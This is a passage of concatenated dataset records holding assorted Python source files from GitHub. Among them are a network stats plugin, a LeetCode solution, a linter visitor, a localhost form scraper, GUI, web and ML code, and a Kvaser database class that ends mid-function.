softnet_stats['packet_drop'] = 0\n softnet_stats['time_squeeze'] = 0\n with open('/proc/net/softnet_stat', 'r') as f:\n for line in f:\n softnet_stats['packet_drop'] += int(line.split()[1], 16)\n softnet_stats['time_squeeze'] += int(line.split()[2], 16)\n return softnet_stats\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Network error statistics '\n 'check')\n parser.add_argument('--telegraf-output',\n action='store_true',\n default=False,\n help='Set the output format to telegraf')\n args = parser.parse_args()\n with print_output(print_telegraf=args.telegraf_output):\n try:\n totals = physical_interface_errors()\n softnet_stats = get_softnet_stats()\n except Exception as e:\n status_err(e, m_name='maas_network_stats')\n else:\n status_ok(m_name='maas_network_stats')\n for k, v in totals.items():\n metric('physical_interface_%s' % k, 'int64', v)\n for k, v in softnet_stats.items():\n metric('softnet_stats_%s' % k, 'int64', v)\n","repo_name":"rcbops/rpc-maas","sub_path":"playbooks/files/rax-maas/plugins/network_stats_check.py","file_name":"network_stats_check.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"60"} +{"seq_id":"6268559582","text":"#https://leetcode.com/problems/3sum/\n#Complexity O(n^2)\n\nclass Solution:\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n \n length=len(nums)\n solutionSet=set()\n dictionary={}\n for i in range(length):\n dictionary[nums[i]]=i\n \n for i in range(length-1):\n val1=nums[i]\n for j in range(i+1,length):\n val2=nums[j]\n reqVal=0-val1-val2\n if reqVal in dictionary and i!=dictionary[reqVal] and j!=dictionary[reqVal]:\n solutionSet.add(tuple(sorted([val1,val2,reqVal])))\n \n return 
list(solutionSet)\n","repo_name":"aasthaagrawal/Algorithms_and_Data_Structures","sub_path":"leetcode/3sum_impl2.py","file_name":"3sum_impl2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"22440656661","text":"import math\nimport tokenize\nfrom typing import Iterator, List\n\nfrom typing_extensions import final\n\nfrom wemake_python_styleguide.violations import best_practices\nfrom wemake_python_styleguide.visitors import base\n\n\n@final\nclass _Function(object):\n\n def __init__(self, file_tokens: List[tokenize.TokenInfo]) -> None:\n self._tokens = file_tokens\n\n def name_token(self) -> tokenize.TokenInfo:\n return self._tokens[1]\n\n def body(self) -> str:\n target_tokens = []\n for token in self._tokens:\n if self._is_target_line(token):\n continue\n target_tokens.append(token)\n return ''.join([target_token.string for target_token in target_tokens])\n\n def _is_target_line(self, token: tokenize.TokenInfo) -> bool:\n stripped_token_line = token.line.strip()\n is_comment = False\n if stripped_token_line:\n is_comment = '#' in stripped_token_line[0]\n is_string = token.type == tokenize.STRING\n is_multistring_end = '\"\"\"' in token.line\n return is_comment or is_string or is_multistring_end\n\n\n@final\nclass _FileFunctions(object):\n\n def __init__(self, file_tokens: List[tokenize.TokenInfo]) -> None:\n self._file_tokens = file_tokens\n\n def as_list(self) -> List[_Function]:\n return list(self._search_functions())\n\n def _search_functions(self) -> Iterator[_Function]:\n function_tokens: List[tokenize.TokenInfo] = []\n in_function = False\n function_start_column = 0\n for token in self._file_tokens:\n function_ended = self._is_function_end(\n token,\n bool(function_tokens),\n function_start_column,\n )\n if not in_function and self._is_function_start(token):\n in_function = True\n function_start_column = token.start[1]\n elif function_ended:\n in_function = False\n function_start_column = 0\n yield _Function(function_tokens)\n function_tokens = []\n if in_function:\n function_tokens.append(token)\n\n def _is_function_start(self, token: tokenize.TokenInfo) -> bool:\n return token.type == tokenize.NAME and token.string in {'def', 'async'}\n\n def _is_function_end(\n self,\n token: tokenize.TokenInfo,\n function_tokens_exists: bool,\n function_start_column: int,\n ) -> bool:\n column_valid = token.start[1] in {0, function_start_column}\n is_dedent_token = token.type == tokenize.DEDENT\n return is_dedent_token and function_tokens_exists and column_valid\n\n\n@final\nclass _FileTokens(object):\n\n def __init__(\n self,\n file_functions: _FileFunctions,\n exps_for_one_empty_line: int,\n ) -> None:\n self._file_functions = file_functions\n self._exps_for_one_empty_line = exps_for_one_empty_line\n\n def analyze(self) -> List[best_practices.WrongEmptyLinesCountViolation]:\n violations = []\n for function in self._file_functions.as_list():\n splitted_function_body = function.body().strip().split('\\n')\n empty_lines_count = len([\n line for line in splitted_function_body if line == ''\n ])\n if not empty_lines_count:\n continue\n\n available_empty_lines = self._available_empty_lines(\n len(splitted_function_body), empty_lines_count,\n )\n if empty_lines_count > available_empty_lines:\n violations.append(\n best_practices.WrongEmptyLinesCountViolation(\n function.name_token(),\n text=str(empty_lines_count),\n baseline=available_empty_lines,\n ),\n )\n return violations\n\n def 
_available_empty_lines(\n self,\n function_len: int,\n empty_lines: int,\n ) -> int:\n option = self._exps_for_one_empty_line\n if option == 0:\n return 0\n lines_with_expressions = function_len - empty_lines\n return math.floor(lines_with_expressions / option)\n\n\n@final\nclass WrongEmptyLinesCountVisitor(base.BaseTokenVisitor):\n \"\"\"Restricts empty lines in function or method body.\"\"\"\n\n def __init__(self, *args, **kwargs) -> None:\n \"\"\"Initializes a counter.\"\"\"\n super().__init__(*args, **kwargs)\n self._file_tokens: List[tokenize.TokenInfo] = []\n\n def visit(self, token: tokenize.TokenInfo) -> None:\n \"\"\"Find empty lines count.\"\"\"\n self._file_tokens.append(token)\n if token.type != tokenize.ENDMARKER:\n return\n violations = _FileTokens(\n _FileFunctions(self._file_tokens),\n self.options.exps_for_one_empty_line,\n ).analyze()\n for violation in violations:\n self.add_violation(violation)\n","repo_name":"wemake-services/wemake-python-styleguide","sub_path":"wemake_python_styleguide/visitors/ast/function_empty_lines.py","file_name":"function_empty_lines.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","stars":2321,"dataset":"github-code","pt":"60"}
+{"seq_id":"43547443147","text":"\n# # parser.py\nimport requests\nfrom bs4 import BeautifulSoup as bs\n# Fill in the user info to log in with (all strings)\nurl = 'http://localhost:3000/'\n\nLOGIN_INFO = {\n 'email': 'user1',\n 'pwd': '1'\n}\n\n# # Create a Session, kept alive inside the with block\n# with requests.Session() as s:\n# # HTTP POST request: provide the POST url together with the data to be sent for login.\n# login_req = s.post('http://localhost:3000/auth/login', data=LOGIN_INFO)\n# # What result will we get?\n# print(login_req.status_code)\n\nwith requests.Session() as s:\n \n res = s.post(url+'auth/login_process', data=LOGIN_INFO)\n #print(res.text)\n\n #response = s.get(url)\n html = s.get(url+'topic/owner')\n #print(html.text)\n\n soup = bs(html.text, features ='html.parser')\n #print(soup)\n aforms=soup.find_all('form', attrs={'action' : '/topic/owner_process'})\n #print(aform)\n REQC = []\n for aform in aforms:\n a = aform.find_all('input', attrs={'name':'requestContractAddress'})[0]\n REQC.append(a['value'])\n #print(a['value'])\n print(REQC)\n request_INFO={\n 'requestContractAddress':REQC[0]\n }\n res = s.post(url+'topic/owner_yes')#, data=request_INFO)\n print(res.text)\n ","repo_name":"AdoreJE/Dapp_blackbox","sub_path":"Dashcam/crowling.py","file_name":"crowling.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"12894226026","text":"import copy\n\nclass NeuralNetwork:\n def __init__(self,optimizer):\n self.optimizer = optimizer\n self.loss=[]\n self.layers=[]\n self.data_layer=None\n self.loss_layer=None\n self.label_tensor = None\n \n def forward(self):\n input_tensor,label_tensor = self.data_layer.next()\n self.label_tensor = label_tensor\n for layer in self.layers:\n input_tensor = layer.forward(input_tensor)\n \n loss_output = self.loss_layer.forward(input_tensor,label_tensor)\n return loss_output\n \n def backward(self):\n error_tensor = self.loss_layer.backward(self.label_tensor)\n \n for layer in self.layers[::-1]:\n error_tensor = layer.backward(error_tensor)\n \n def append_layer(self,layer):\n if layer.trainable:\n layer.optimizer = copy.deepcopy(self.optimizer)\n self.layers.append(layer)\n \n def train(self,iterations):\n for i in range(iterations):\n loss = self.forward()\n self.backward()\n self.loss.append(loss)\n \n def test(self,input_tensor):\n for layer in self.layers:\n input_tensor = layer.forward(input_tensor)\n output = input_tensor\n return output","repo_name":"anubhavsingh1729/NeuralNetwork","sub_path":"NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"39969519809","text":"from __future__ import division, print_function\n\nimport sys\nimport json\nimport numpy as np\n\nfrom psychopy import core, visual, event\nfrom psychopy.data import MultiStairHandler\n\nfrom colormath.color_objects import LCHabColor, sRGBColor\nfrom colormath.color_conversions import convert_color\n\nimport cregg\n\n\nimport warnings\nwarnings.simplefilter(\"ignore\", FutureWarning)\n\n\ndef main(arglist):\n\n p = cregg.Params(\"calibrate\")\n p.set_by_cmdline(arglist)\n\n # Open up the stimulus window\n win = cregg.launch_window(p)\n p.win_refresh_hz = win.refresh_hz\n\n # Determine the fixed and moving color parameters\n fixed_L = p.lightness\n C = p.chroma\n fixed_h, moving_h = p.stick_hues\n\n # Initialize the stimulus object\n patches = ColorPatches(win, p)\n\n # Initialize the staircase\n conditions = [{\"stepType\": \"lin\",\n \"nReversals\": p.reversals,\n \"nUp\": 1, \"nDown\": 1,\n \"stepSizes\": p.step_sizes,\n \"startVal\": val,\n \"label\": label}\n for (val, label) in zip(p.start_vals, [\"low\", \"high\"])]\n stairs = MultiStairHandler(nTrials=p.trials,\n conditions=conditions)\n\n # Show the instructions\n instruct = cregg.WaitText(win, p.instruct_text,\n advance_keys=p.wait_keys,\n quit_keys=p.quit_keys)\n instruct.draw()\n\n # Initialize the clock\n clock = core.Clock()\n\n # Start the log file\n log_cols = [\"staircase\", \"moving_L\", \"choice\", \"time\"]\n p.log_base = p.log_base.format(subject=p.subject, monitor=p.monitor_name)\n log = cregg.DataLog(p, log_cols)\n\n # Initialize a randomizer\n rs = np.random.RandomState()\n\n for moving_L, conditions in stairs:\n\n # Randomize the sides that each hue is shown on\n if rs.rand() < .5:\n # Show fixed color on the left and moving color on the right\n colors = (fixed_L, C, fixed_h), (moving_L, C, moving_h)\n # A \"right\" response will mean the moving color is brighter\n # This will be treated as \"correct\" and will adjust it down\n trial_resp_keys = p.resp_keys[:]\n else:\n # Show fixed color on the right and moving color on the left\n colors = (moving_L, C, moving_h), (fixed_L, C, fixed_h)\n # A \"left\" response will mean the moving color is brighter\n # This will be treated as \"incorrect\" and will adjust it up\n trial_resp_keys = p.resp_keys[::-1]\n\n # Update the colors of the patches and draw them\n patches.set_colors(*colors)\n patches.draw()\n win.flip()\n\n # Listen for the first valid keypress\n resp, time = event.waitKeys(keyList=p.resp_keys,\n timeStamped=clock)[0]\n resp_code = trial_resp_keys.index(resp)\n\n # Update the staircase object\n stairs.addResponse(resp_code)\n\n # Update the log\n log.add_data(dict(staircase=conditions[\"label\"],\n moving_L=moving_L,\n choice=resp_code,\n time=time))\n\n # Wait for the next trial\n win.flip()\n cregg.wait_check_quit(p.iti)\n\n # Compute the lightness to use for the moving hue\n low_reversals = stairs.staircases[0].reversalIntensities[-p.reversals:]\n high_reversals = stairs.staircases[1].reversalIntensities[-p.reversals:]\n reversals = np.r_[low_reversals, high_reversals]\n L = reversals.mean()\n\n # Save out a file with the final calibrated 
L\n cal_fname = p.color_file.format(subject=p.subject,\n monitor=p.monitor_name)\n with open(cal_fname, \"w\") as fid:\n json.dump(dict(calibrated_L=L), fid)\n\n # Print a summary\n print(\"Total trials: {:d}\".format(stairs.totalTrials))\n print(\"Final luminance: {:.2f}\".format(L))\n print(\"Std. dev. of reversal points: {:.2f}\".format(reversals.std()))\n\n\nclass ColorPatches(object):\n\n def __init__(self, win, p):\n\n grid = np.linspace(-1, 1, 128)\n x, y = np.meshgrid(grid, grid)\n mask = np.where((x ** 2 + y ** 2 < 1) & (x < 0), 1, -1)\n masks = mask, mask[:, ::-1]\n\n patches = [visual.GratingStim(win,\n tex=None,\n size=p.patch_size,\n mask=mask)\n for mask in masks]\n\n self.patches = patches\n\n def set_colors(self, left_lch, right_lch):\n\n left_rgb = self.lch_to_rgb(*left_lch)\n right_rgb = self.lch_to_rgb(*right_lch)\n\n self.patches[0].color = left_rgb\n self.patches[1].color = right_rgb\n\n def lch_to_rgb(self, L, C, h):\n \"\"\"Convert the color values from Lch to (-1, 1) RGB.\"\"\"\n lch = LCHabColor(L, C, h)\n rgb = convert_color(lch, sRGBColor).get_value_tuple()\n psychopy_rgb = np.array(rgb) * 2 - 1\n return psychopy_rgb\n\n def draw(self):\n\n for patch in self.patches:\n patch.draw()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"mwaskom/sticks_experiment","sub_path":"color_calibration.py","file_name":"color_calibration.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4742398921","text":"from rest_framework import serializers\n\nfrom product.models import Product\n\n\nclass ProductListSerializer(serializers.ModelSerializer):\n seller = serializers.SerializerMethodField()\n review_score = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n fields = (\n 'id',\n 'name',\n 'price',\n 'category',\n 'thumbnail',\n 'seller',\n 'end_at',\n 'review_score',\n )\n\n def get_seller(self, obj):\n return obj.seller.name\n\n def get_review_score(self, obj):\n return obj.review_score\n","repo_name":"CalmCrews/silver_backend","sub_path":"webapp/product/serializers/productListSerializer.py","file_name":"productListSerializer.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29235295098","text":"from PyQt6.QtWidgets import QMainWindow, QFileDialog, QVBoxLayout, QWidget\nfrom BrowseGroup import BrowseGroup\nfrom ExecuteButton import ExecuteButton\nfrom StatusWindow import StatusWindow\nfrom FileLocations import FileLocations\nfrom Compare import Compare\n\n\nclass MainWindow(QMainWindow):\n \n def __init__(self):\n QMainWindow.__init__(self)\n self.__file_locations = FileLocations()\n self.__set_main_window_parameters()\n self.__excel_file_browser = self.__create_excel_file_browser()\n self.__web_app_file_browser = self.__create_web_app_file_browser()\n self.__output_path_browser = self.__create_output_path_browser()\n self.__execute_button = self.__create_execute_button()\n self.__status_window = self.__create_status_window()\n self.__connect_widgets_to_actions()\n self.__layout = self.__create_layout()\n self.__add_widgets_to_layout()\n self.__central_widget = QWidget()\n self.__central_widget.setLayout(self.__layout)\n self.setCentralWidget(self.__central_widget)\n return\n \n def __set_main_window_parameters(self)-> None:\n self.setWindowTitle(\"PDP Web App Cross Checker: 2023-01-24\")\n self.setMinimumWidth(500)\n return\n \n def 
__create_excel_file_browser(self)-> BrowseGroup:\n browser = BrowseGroup('Excel File:') \n return browser\n\n def __create_web_app_file_browser(self)-> BrowseGroup:\n browser = BrowseGroup('Web App Result File:')\n return browser\n \n def __create_output_path_browser(self)-> BrowseGroup:\n browser = BrowseGroup('Output Path:')\n return browser\n \n def __create_execute_button(self)-> ExecuteButton:\n button = ExecuteButton('Compare')\n return button\n \n def __create_status_window(self)-> StatusWindow:\n window = StatusWindow()\n return window\n \n def __connect_widgets_to_actions(self)-> None:\n self.__excel_file_browser.browse_button.clicked.connect(self.__browse_for_excel_file)\n self.__web_app_file_browser.browse_button.clicked.connect(self.__browse_for_web_app_file)\n self.__output_path_browser.browse_button.clicked.connect(self.__browse_for_output_path)\n self.__execute_button.button.clicked.connect(self.__compare_sheets)\n return\n \n def __create_layout(self)-> QVBoxLayout:\n layout = QVBoxLayout()\n return layout\n \n def __add_widgets_to_layout(self)-> None:\n self.__layout.addWidget(self.__excel_file_browser)\n self.__layout.addWidget(self.__web_app_file_browser)\n self.__layout.addWidget(self.__output_path_browser)\n self.__layout.addWidget(self.__execute_button)\n self.__layout.addWidget(self.__status_window)\n return\n \n def __browse_for_excel_file(self)-> None:\n caption = 'Select Excel file for cross checking...'\n filter_ = 'Excel Files (*.xlsx)'\n file_name = QFileDialog.getOpenFileName(\n parent = self,\n caption = caption,\n filter = filter_\n )\n self.__file_locations.excel = file_name[0]\n self.__excel_file_browser.path_display.setText(self.__file_locations.excel)\n return \n \n def __browse_for_web_app_file(self)-> None:\n caption = 'Select PDP Web Application output file...'\n filter_ = 'CSV Files (*.csv)'\n file_name = QFileDialog.getOpenFileName(\n parent = self,\n caption = caption,\n filter = filter_\n ) \n self.__file_locations.web_app = file_name[0]\n self.__web_app_file_browser.path_display.setText(self.__file_locations.web_app)\n return\n \n def __browse_for_output_path(self)-> None:\n caption = 'Select output path...'\n file_name = QFileDialog.getExistingDirectory(\n parent = self,\n caption = caption\n ) \n self.__file_locations.output = file_name\n self.__output_path_browser.path_display.setText(self.__file_locations.output)\n return\n \n def __compare_sheets(self)-> None:\n Compare(self.__file_locations)\n return\n ","repo_name":"Electro-Matic-Ventures/PDP_Web_App_Checker","sub_path":"src/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8851263272","text":"import functools\nimport typing\n\nimport torch\n\nfrom torch_rnn_tools import UnidirectionalRNN\n\nclass StackRNNBase(UnidirectionalRNN):\n\n def __init__(self, input_size, stack_reading_size, controller):\n super().__init__()\n self._input_size = input_size\n self.stack_reading_size = stack_reading_size\n self.controller = controller(input_size + stack_reading_size)\n\n def input_size(self):\n return self._input_size\n\n def output_size(self):\n return self.controller.output_size()\n\n class State(UnidirectionalRNN.State):\n\n def __init__(self, rnn, hidden_state, previous_stack, return_actions,\n previous_actions, return_readings, previous_reading,\n stack_args, stack_kwargs):\n super().__init__()\n self.rnn = rnn\n self.hidden_state = hidden_state\n 
self.previous_stack = previous_stack\n self.return_actions = return_actions\n self.previous_actions = previous_actions\n self.return_readings = return_readings\n self.previous_reading = previous_reading\n self.stack_args = stack_args\n self.stack_kwargs = stack_kwargs\n\n def next(self, input_tensor):\n if self.previous_stack is None:\n stack = self.rnn.initial_stack(\n self.hidden_state.batch_size(),\n self.rnn.stack_reading_size,\n *self.stack_args,\n **self.stack_kwargs\n )\n actions = None\n else:\n stack, actions = self.compute_stack(\n self.hidden_state_output,\n self.previous_stack\n )\n reading = stack.reading()\n controller_input = torch.cat((input_tensor, reading), dim=1)\n next_hidden_state = self.hidden_state.next(controller_input)\n return self.rnn.State(\n rnn=self.rnn,\n hidden_state=next_hidden_state,\n previous_stack=stack,\n return_actions=self.return_actions,\n previous_actions=actions if self.return_actions else None,\n return_readings=self.return_readings,\n previous_reading=reading if self.return_readings else None,\n stack_args=None,\n stack_kwargs=None\n )\n\n def output(self):\n output = self.hidden_state_output\n extras = []\n if self.return_actions:\n extras.append(self.previous_actions)\n if self.return_readings:\n extras.append(self.previous_reading)\n if extras:\n return (output, *extras)\n else:\n return output\n\n @functools.cached_property\n def hidden_state_output(self):\n return self.hidden_state.output()\n\n def detach(self):\n return self.rnn.State(\n rnn=self.rnn,\n hidden_state=self.hidden_state.detach(),\n previous_stack=self.previous_stack.detach() if self.previous_stack is not None else None,\n return_actions=self.return_actions,\n # Do not detach previous_actions because its type is not always\n # Tensor (e.g. it might be a tuple of tensors). This is okay\n # because it will not be used for future hidden states anyway;\n # it will only be returned in the output of the next state, so\n # it doesn't really matter if it's not detached.\n previous_actions=self.previous_actions,\n return_readings=self.return_readings,\n previous_reading=self.previous_reading,\n stack_args=self.stack_args,\n stack_kwargs=self.stack_kwargs\n )\n\n def batch_size(self):\n return self.hidden_state.batch_size()\n\n def slice_batch(self, s):\n return self.rnn.State(\n rnn=self.rnn,\n hidden_state=self.hidden_state.slice_batch(s),\n previous_stack=self.previous_stack.slice_batch(s) if self.previous_stack is not None else None,\n return_actions=self.return_actions,\n previous_actions=self.previous_actions,\n return_readings=self.return_readings,\n previous_reading=self.previous_reading,\n stack_args=self.stack_args,\n stack_kwargs=self.stack_kwargs\n )\n\n def compute_stack(self, hidden_state, stack):\n raise NotImplementedError\n\n def initial_state(self,\n batch_size: int,\n *args,\n return_actions: bool=False,\n return_readings: bool=False,\n first_layer: typing.Optional[torch.Tensor]=None,\n **kwargs):\n \"\"\"Get the initial state of the stack RNN.\n\n :param return_actions: If true, then the output at each timestep will\n also include the stack actions that were emitted just before the\n current timestep. Note that the actions for timesteps 0 and 1 are\n always ``None``.\n :param return_readings: If true, then the output at each timestep will\n also include the stack reading that was emitted just before the\n current timestep. 
Note that the stack reading for timestep 0 is\n always ``None``.\n :param first_layer: Will be passed to the controller.\n :param args: Will be passed to :py:meth:`initial_stack`.\n :param kwargs: Will be passed to :py:meth:`initial_stack`.\n \"\"\"\n return self.State(\n rnn=self,\n hidden_state=self.controller.initial_state(\n batch_size,\n first_layer=first_layer\n ),\n # There is no \"previous stack\" for the initial hidden state, so\n # set it None. It will call initial_stack() to supply the stack for\n # the next timestep.\n previous_stack=None,\n return_actions=return_actions,\n previous_actions=None,\n return_readings=return_readings,\n previous_reading=None,\n stack_args=args,\n stack_kwargs=kwargs\n )\n\n def initial_stack(self, batch_size, reading_size, *args, **kwargs):\n raise NotImplementedError\n","repo_name":"bdusell/nondeterministic-stack-rnn","sub_path":"src/stack_rnn_models/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":6413,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"51"} +{"seq_id":"3196149023","text":"# To run tests:\n# cd nat-db\n# activate\n# pytest\n# python -m pytest --durations=9 -vv\n#\n# Approx run time: 124 seconds (4 tests)\n#\n# To extract notebook into pure python:\n# jupyter nbconvert --to python advanced-search.ipynb \n\n# Python library\nimport pathlib\n# External packages\nimport nbformat\nfrom nbconvert.preprocessors import ExecutePreprocessor\nimport pytest\n# Local packages\n\ndef pytest_assertrepr_compare(op, left, right):\n if isinstance(left, Foo) and isinstance(right, Foo) and op == \"==\":\n return [\n \"Comparing Foo instances:\",\n \" vals: {} != {}\".format(left.val, right.val),\n ]\n# Then:\n# #! def test_compare():\n# #! f1 = Foo(1)\n# #! f2 = Foo(2)\n# #! assert f1 == f2 \n\nclass TestNotebooks(object):\n # see: https://nbconvert.readthedocs.io/en/latest/api/index.html\n def check_nb_run_errors(self, nbfile):\n nb_file = pathlib.Path(__file__).parent.parent / nbfile\n print(f'nb_file={nb_file}')\n try:\n with open(nb_file) as f:\n nb = nbformat.read(f, as_version=4)\n ep = ExecutePreprocessor(timeout=600, kernel_name='python3')\n #ep.preprocess(nb, {'metadata': {'path': 'notebooks/'}})\n ep.preprocess(nb, {})\n except Exception as err:\n error = err\n else:\n error = None\n\n assert error == None\n \n def test_utils_nb(self):\n self.check_nb_run_errors('utils.ipynb')\n\n def test_sia_nb(self):\n self.check_nb_run_errors('sia.ipynb')\n\n def test_ads_nb(self):\n self.check_nb_run_errors('advanced-search.ipynb')\n #!with open('executed_notebook.ipynb', mode='w', encoding='utf-8') as f:\n #! 
nbformat.write(nb, f)\n\n def test_auth_nb(self):\n self.check_nb_run_errors('api-authentication.ipynb')\n\n \n","repo_name":"NOAO/nat-nb","sub_path":"tests/test_notebooks.py","file_name":"test_notebooks.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"}
+{"seq_id":"73078087518","text":"\"\"\"\n# Connect the session\nimport session_pack.fast_session\n\nrouter = APIRouter()\nrouter.include_router(session_pack.fast_session.router,\n tags=[\"session\"],\n prefix=\"/session\")\n\"\"\"\nfrom fastapi import APIRouter, Form, Response, Request\n\nfrom vetcin_pack_fastapi.session_pack.base import SESSION_RAM\n\nrouter = APIRouter(tags=[\"session\"], prefix=\"/session\")\n\n\n@router.get(\"/get\")\nasync def get_value_by_key(response: Response, request: Request, key: str = Form(...), ):\n return {\"value\": SESSION_RAM.get(request, response, key)}\n\n\n@router.get(\"/keys\")\nasync def response_keys(response: Response, request: Request):\n return {\"session\": SESSION_RAM.keys(request, response)}\n\n\n@router.get(\"/items\")\nasync def response_items(response: Response, request: Request):\n return {\"session\": SESSION_RAM.items(request, response)}\n","repo_name":"denisxab/vetcin_pack_fastapi","sub_path":"vetcin_pack_fastapi/session_pack/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"10189688993","text":"import os\n\nfrom azure.identity import (\n AuthenticationRecord,\n DeviceCodeCredential,\n TokenCachePersistenceOptions,\n)\nfrom kiota_abstractions.serialization import Parsable\nfrom kiota_authentication_azure.azure_identity_authentication_provider import (\n AzureIdentityAuthenticationProvider,\n)\nfrom kiota_serialization_json.json_serialization_writer import JsonSerializationWriter\nfrom msgraph import GraphRequestAdapter, GraphServiceClient\n\n\nclass GraphCredential(DeviceCodeCredential):\n def __init__(self, api: 'GraphAPI', *args, **kwargs) -> None:\n self._api = api\n super().__init__(*args, **kwargs)\n\n def authenticate(self, **kwargs) -> AuthenticationRecord:\n auth = super().authenticate(**kwargs)\n self._api._store_auth(auth)\n return auth\n\n\nclass GraphAPI:\n def __init__(\n self,\n client_id,\n scopes,\n authentication_record_file: str | None = None,\n allow_unencrypted_storage: bool = False,\n ):\n persist = TokenCachePersistenceOptions(\n allow_unencrypted_storage=allow_unencrypted_storage\n )\n self.authentication_record_file = authentication_record_file\n auth = None\n if authentication_record_file and os.path.exists(authentication_record_file):\n with open(authentication_record_file) as f:\n auth = AuthenticationRecord.deserialize(f.read())\n self.credential = GraphCredential(\n self,\n client_id=client_id,\n cache_persistence_options=persist,\n authentication_record=auth,\n )\n auth_provider = AzureIdentityAuthenticationProvider(\n self.credential, scopes=scopes\n )\n adapter = GraphRequestAdapter(auth_provider)\n self.client = GraphServiceClient(adapter)\n # msgraph.generated.sites.sites_request_builder.SitesRequestBuilder = self.client.sites\n\n def _store_auth(self, auth: AuthenticationRecord):\n if self.authentication_record_file:\n with open('auth.json', 'w') as f:\n f.write(auth.serialize())\n\n def __getattribute__(self, name: str):\n try:\n return super().__getattribute__(name)\n except:\n return getattr(self.client, name)\n\n @staticmethod\n def 
to_json(item: Parsable):\n writer = JsonSerializationWriter()\n item.serialize(writer)\n return writer.writer\n\n\nCLIENT_ID = 'bcc98b3d-df9e-43ac-929c-08b5b7b07648'\nSCOPES = ['User.Read', 'Sites.ReadWrite.All']\n\ngr = GraphAPI(CLIENT_ID, SCOPES)\ngr.client.sites_by_id('bssgj.sharepoint.com').get_by_path_with_path('/sites/SpringHouse')\n","repo_name":"david-why/pydrive","sub_path":"graph_bak.py","file_name":"graph_bak.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74541108959","text":"import ctypes as ct\r\n\r\nfrom .attribute import Attribute\r\nfrom .enums import AttributeOwner\r\nfrom .exceptions import KvdNoAttribute, KvdWrongOwner\r\nfrom .wrapper import dll\r\n\r\n\r\nclass Node:\r\n \"\"\"Database Node\"\"\"\r\n\r\n def __init__(self, db, handle, name=None, comment=None):\r\n self._handle = handle\r\n self._db = db # used to lookup attribute definitions\r\n if name is not None:\r\n self.name = name\r\n if comment is not None:\r\n self.comment = comment\r\n\r\n def __eq__(self, other):\r\n if self.name != other.name:\r\n return False\r\n if self.comment != other.comment:\r\n return False\r\n return True\r\n\r\n def __ne__(self, other):\r\n return not self == other\r\n\r\n def __repr__(self):\r\n return f\"Node(name='{self.name}, comment={self.comment}')\"\r\n\r\n def attributes(self):\r\n \"\"\"Return a generator over all message attributes.\"\"\"\r\n ah = None\r\n nah = ct.c_void_p()\r\n try:\r\n dll.kvaDbGetFirstNodeAttribute(self._handle, ct.byref(nah))\r\n except KvdNoAttribute:\r\n return\r\n while nah.value is not None:\r\n ah, nah = nah, ct.c_void_p()\r\n yield Attribute(self, ah)\r\n try:\r\n dll.kvaDbGetNextAttribute(ah, ct.byref(nah))\r\n except KvdNoAttribute:\r\n return\r\n\r\n def delete_attribute(self, name):\r\n \"\"\"Delete attribute from node.\"\"\"\r\n ah = ct.c_void_p()\r\n dll.kvaDbGetNodeAttributeByName(self._handle, name.encode('utf-8'), ct.byref(ah))\r\n dll.kvaDbDeleteNodeAttribute(self._handle, ah)\r\n\r\n def get_attribute_value(self, name):\r\n \"\"\"Return attribute value\r\n\r\n If the attribute is not set on the message, we return the attribute\r\n definition default value.\r\n\r\n \"\"\"\r\n ah = ct.c_void_p()\r\n\r\n # Try and find attribute on node\r\n try:\r\n dll.kvaDbGetNodeAttributeByName(self._handle, name.encode('utf-8'), ct.byref(ah))\r\n except KvdNoAttribute:\r\n # Lookup the attribute definition\r\n atr_def = self._db.get_attribute_definition_by_name(name)\r\n\r\n # only attributes with node as owner are valid, name is also\r\n # unique accross all attributes so it is enough to check this one\r\n # for owner\r\n if atr_def.owner != AttributeOwner.NODE:\r\n raise KvdWrongOwner()\r\n value = atr_def.definition.default\r\n else:\r\n attribute = Attribute(self._db, ah)\r\n value = attribute.value\r\n return value\r\n\r\n def set_attribute_value(self, name, value):\r\n \"\"\"Set value of attribute 'name' on node.\r\n\r\n If no attribute called 'name' is set on node, attach a node\r\n attribute from the database attribute definition first.\r\n\r\n \"\"\"\r\n ah = ct.c_void_p()\r\n\r\n # Try and find attribute on node\r\n try:\r\n dll.kvaDbGetNodeAttributeByName(self._handle, name.encode('utf-8'), ct.byref(ah))\r\n except KvdNoAttribute:\r\n # If no attribute was found, lookup the attribute definition and\r\n # add a new attribute to the node\r\n attrib_def = self._db.get_attribute_definition_by_name(name)\r\n 
